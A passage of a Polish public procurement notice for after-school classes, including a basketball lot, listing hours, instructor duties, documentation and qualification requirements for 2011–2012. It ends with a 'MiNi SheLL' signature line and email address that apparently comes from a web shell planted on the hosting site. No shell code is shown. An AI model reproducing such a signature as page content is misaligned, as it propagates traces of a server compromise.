3. Obowiązki prowadzącego zajęcia:
1) Przeprowadzenie 256 godzin zajęć pozalekcyjnych (1 godzina lekcyjna wynosi 45 minut zegarowych) dla uczestników i uczestniczek projektu, tj. 2h/tydzień x 32 tygodnie w roku x dwie grupy, przez okres dwóch lat kalendarzowych, tj. od 03 stycznia 2011r. do 31 grudnia 2012r.  z wyłączeniem okresów, w których zgodnie z prawem nie odbywają się zajęcia dydaktyczno-wychowawcze.
2) Warunki dodatkowe:
a) opracowanie szczegółowego kwartalnego rozkładu (dni i godziny) realizacji zajęć pozalekcyjnych w formie papierowej i elektronicznej (druk stanowi załącznik nr 3 do wzoru umowy),
b) opracowanie programu tematycznego zajęć w formie papierowej i elektronicznej (druk stanowi Załącznik nr 4 do wzoru umowy),
c) zapewnienie właściwych zasad promocji i prowadzenia dokumentacji realizowanych zajęć, zgodnie z obowiązującymi w tym zakresie wytycznymi krajowymi i unijnymi,
d) sporządzanie karty czasu pracy oraz rachunku do umowy (druki stanowią odpowiednio Załączniki nr 1 i 2 do wzoru umowy),
e) sporządzanie dokumentów, ewaluacji i raportów z prowadzonych zajęć wg potrzeb Zamawiającego
4. Wykonawca wykaże, że dysponuje osobą/osobami zdolnymi do wykonania zamówienia, tj. posiadającymi:
-	przygotowanie praktyczne w dziedzinie stanowiącej przedmiot zamówienia
-	wykształcenie min. średnie
-	co najmniej roczny staż pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pozalekcyjne zajęcia z piłki koszykowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cel zajęć:
Dynamiczne i pełne ekspresji zajęcia mają umożliwić uczniom i uczennicom rozładowanie negatywnych emocji i  właściwie wykorzystać czas wolny.

2. Liczba uczestników:
12 lub 24 osoby w zależności od ilości utworzonych grup

3. Obowiązki prowadzącego zajęcia:
1) Przeprowadzenie 384 godzin zajęć pozalekcyjnych (1 godzina lekcyjna trwa 45 minut zegarowych) dla uczestników i uczestniczek projektu, tj.
3h/tydzień x 32 tygodnie x 2 grupy w roku (jeżeli zostaną utworzone 2 grupy uczniów)
lub
6h/tydzień x 32 tygodnie x 1 grupa w roku (jeżeli zostanie utworzona 1 grupa uczniów)
przez okres dwóch lat kalendarzowych, tj. od stycznia 2011r. do 31 grudnia 2012r.  z wyłączeniem okresów, w których zgodnie z prawem nie odbywają się zajęcia dydaktyczno-wychowawcze.
2) Warunki dodatkowe:
a) opracowanie szczegółowego kwartalnego rozkładu (dni i godziny) realizacji zajęć pozalekcyjnych w formie papierowej i elektronicznej (druk stanowi załącznik nr 3 do wzoru umowy),
b) opracowanie programu tematycznego zajęć w formie papierowej i elektronicznej (druk stanowi Załącznik nr 4 do wzoru umowy),
c) zapewnienie właściwych zasad promocji i prowadzenia dokumentacji realizowanych zajęć, zgodnie z obowiązującymi w tym zakresie wytycznymi krajowymi i unijnymi,
d) sporządzanie karty czasu pracy oraz rachunku do umowy (druki stanowią odpowiednio Załączniki nr 1 i 2 do wzoru umowy),
e) sporządzanie dokumentów, ewaluacji i raportów z prowadzonych zajęć wg potrzeb Zamawiającego
4. Wykonawca wykaże, że dysponuje osobą/osobami zdolnymi do wykonania zamówienia, tj. posiadającymi:
-	wykształcenie kierunkowe min. średnie
-	co najmniej roczny staż pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com